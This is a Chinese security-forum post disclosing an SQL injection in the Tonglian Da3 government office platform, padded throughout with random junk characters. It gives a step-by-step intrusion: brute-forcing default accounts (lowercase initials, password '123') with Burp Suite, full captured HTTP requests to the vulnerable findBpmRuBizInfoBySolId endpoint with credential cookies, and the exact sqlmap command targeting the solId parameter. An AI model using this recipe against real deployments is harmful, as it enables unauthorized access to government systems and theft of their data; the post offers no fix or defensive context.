找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1545|回复: 0
打印 上一主题 下一主题

同联Da3协同办公平台前台通用sql injection漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:15:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

Q3 Y5 n$ ]' D/ z: T) L9 V
E4 U- H; d! G4 c& {

R4 I7 [) u, l X+ M- c# ^

% o9 |7 J! Q1 Q9 {6 } 平台简介: , @6 P- s2 }+ J$ e2 d; Z

; }( B: f- j ~- ^5 _

2 W" l# Y: |) |/ k& r. e  + \/ h: t( L9 }) l4 G" m# z

4 z& T( R8 G# L$ ?' X2 D

6 ^& d- {8 r0 x* V9 p5 N" b 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
; V/ a' h8 T7 T; h4 g$ M同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
; x' b# s- k& Y W2 z! u2 k" l同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献! 2 ]% H( i7 k0 }/ O9 H, Y6 q

@( ?- I4 Z$ a: k7 }$ |

5 M8 k+ r$ g" t2 [   0 M& X: o( h# h! ^2 y

& w& T' g7 N+ [

7 K) D0 U: a7 l 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址: 8 f, `$ e% Q/ X( F! q4 h

* V" H1 M* s/ F, y" U2 Q

) z4 r6 e6 f' V2 M# k  : c( Y7 a1 f4 o$ ~- o9 h Q

* W' _$ r! p& I- J1 t

4 U6 J% X- z, L m1 q http://1.1.1.1:7197/cap-aco/#(案例2-)( {' O1 o: a, W8 o$ v* L

9 f- I/ F) }) k( l% f, |* w' \

/ H( t" D& i8 o1 r http://www.XXOO.com (案例1-官网网站)6 r& {: U1 k z0 V% y9 i

0 s% x$ l# t# Q% Y

m* e; h6 V( H' D# `/ P  ) n3 ]0 g) f3 J. I4 q2 g6 k

6 F- w) {% |- ?

; i- T2 T, J2 f, Y: x2 S. f3 P, j 漏洞详情:( z) Y4 @0 |9 ^. n! ~$ L G {9 b: v

* }( Q2 q. K8 h# ~6 }6 Z

5 {* g9 U3 ?: y; }5 j i  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试 , ^% |0 V# p! [; x# E/ e; R1 J

1 b2 S, F9 d# H4 W) x* @8 v7 g

# s" m6 u, \) B U1 i: x1 D B      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图: 0 L3 c6 s8 E, t) u( c1 c$ R) y, f

, B" A9 f5 Y4 O( G" @/ a

7 @4 d9 N. m+ z0 x# e5 d  * @- M# S- S0 s& }2 N( d6 A, Y

4 y8 o$ u% S& ?. }- Y. H& A

5 ~1 Q0 \9 ?3 S% B# `& e  ( u+ o) {6 D* i, r) Q0 t# c

! R6 {5 I9 d, e

. g% f- ^; \$ G2 s status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:- |0 f W: h9 ~) }7 U

- C) B& P% }" \* R

! C6 Z Q. a# \ 1、案例1-官方网站 8 O4 T- ]) a7 b4 ?/ `# @0 O4 E- _) G& L

! A: E; Z E& h

' U+ h+ [ y, ]0 N2 k1 H GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1 6 W7 ^! l2 A# E& T/ O4 A+ ~8 Q! D

% d5 \( N; w$ v5 K

! Z- [! R6 F* _) q g% g( l Host: www.XXOO.com . B: d" l4 h7 K4 p

5 m0 O, o: q" @1 N+ b5 \% s. H

! w4 P6 I3 r( K( h' R" O' s Proxy-Connection: Keep-Alive! G' h8 \) ^+ Z t! w

8 l: f' N: |# R" E- B

$ s& [5 ^+ X; S' ~3 n5 w Accept: application/json, text/javascript, */*; q=0.01 $ _/ X6 V4 v4 a; U

) p! n7 u L+ A- Z( S: w2 b% N

+ M3 F- C6 }6 h" f/ d Accept-Language: zh-CN # @8 W- s$ P4 W0 H, p

4 z: a& k7 V% z" X

) n& \% Q# V1 L. Y Content-Type: application/json ' A: g- n1 E D

% s, ~- }, ^" v& D* a+ c3 o

4 _2 h4 @) y) y, e v& d1 F5 p User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko4 @; ?. t, R9 `' ]; G: z

- k0 q+ R( s) S5 O, {% @

' ?0 |0 @) V$ e# ^+ R6 [ X-Requested-With: XMLHttpRequest % T2 m1 ~% o9 z; `- P2 ~( y9 W

; S' s! x D& X4 x! @

6 V. q5 i. t# `, {5 @ Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002" I* D# z7 ~. G8 `" ^

, { k0 \ Q% h& a, M

; K& A5 v7 D! K1 ? Accept-Encoding: gzip, deflate, sdch " h& D; n1 _( C/ k

" T0 e/ t/ M/ J; [6 h

}4 p5 c" T) @" p; v+ J. q Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e . @" D2 q2 C; {

2 N+ G: i/ ~6 ]8 f0 a

& V4 H' s2 \1 ]! s2 V 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:5 i, Q# A8 J# S; z/ {; P

( P6 E7 P$ ?2 w9 f0 g4 B# L" H

4 ^3 g3 ^* _* G+ [( {) v  & w; L$ _$ |( [3 n1 x- Q

7 c: h/ L+ }- d9 @. b

/ o3 v* l% t9 r! F" W7 p   " g" y1 H; S9 w, T( K

" l- w% Z' }6 ]# R1 ~ @6 |0 D

: H! [ r8 i4 p, ^& V% y  # J0 r, e& o( n K

' f. H8 \: a: F6 m* ^0 O% w

: J0 ]! a: J$ p  0 V8 `3 L. Q, P% [* i

9 l% U) U J6 u# z2 w

% ~- U# {" l" D2 V* K4 b$ e% C1 }  1 R7 D l1 R8 U9 I q. [

. ?( L5 J5 g% Y7 J) u! x4 s

! Z/ w6 }( ^1 Q% C& \3 q6 b6 @/ E% ~1 o 2、案例2-某天河云平台# ?/ ^4 R' a6 D& R

/ `6 Z3 Q; B) B. y$ g& }

5 f, B9 t4 j$ l/ s3 J$ j- t: f; c GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1 ; O' d. G! g$ C: L8 e" t$ F0 _

8 Y/ T7 x/ `. h( U& v

5 i2 F9 k* q$ u1 t* R. e) ~, s Host: 1.1.1.:7197 7 y- h* R: O/ H/ s8 x

3 i0 w) @( z* ~0 ]& p

: y- h9 F4 @; M- c+ q Accept: application/json, text/javascript, */*; q=0.01: ?7 l& K) l2 O& u8 ]1 r

" H' W/ c4 G7 C7 v. b# T" i. S

! Z8 L" `, z1 | g. Q) P X-Requested-With: XMLHttpRequest 0 F; V& ?% D# J5 O$ D; M. \

2 \: P1 P. @7 H. u

& s! l* `6 r$ z( s) D3 E" X User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0+ j h8 m% E9 T1 W

0 s$ e# b- n) q6 j0 b

8 {' G+ g/ g/ Y' F3 |0 B; a/ O Content-Type: application/json - [% ?5 k, q, f3 V, R

0 @4 |4 k: D: H, N6 I6 R1 C

, [' z7 A- b' B( w/ E Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008 ; B* I7 N" ?+ b1 J) ]5 {

4 L" c( ?1 L$ Q

7 E$ P. Z6 G/ \, O6 Z* z Accept-Language: zh-CN,zh;q=0.8 . |, P6 a* d, I F! P' @

! n0 {3 j9 U4 s6 q

/ H( [. {, P# u Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1. @9 i1 t9 V" F; g! Y

! n1 n6 j) S7 k% {5 Q5 x _

. a) Q6 v8 E. Z$ o Connection: close/ a" E& Q/ A) `) U2 X. I

' ?& O! S2 Z5 o+ I0 r3 b4 p& l3 ^

3 d0 B4 d- T$ e, s- N/ [ 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: p* s. F W* | u* w, R

! U$ t3 q/ b y+ y x+ f

2 R& y2 D9 V6 e1 Y6 M N1 y8 Y% k   ' m# T0 k6 j: j* @2 @$ H

% X+ \# w9 ]4 k$ G5 \$ L; h$ f! |

1 z; F! R8 \' Z1 w1 A! V& x
1 c3 \$ ^7 Z% X; H* N! E

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表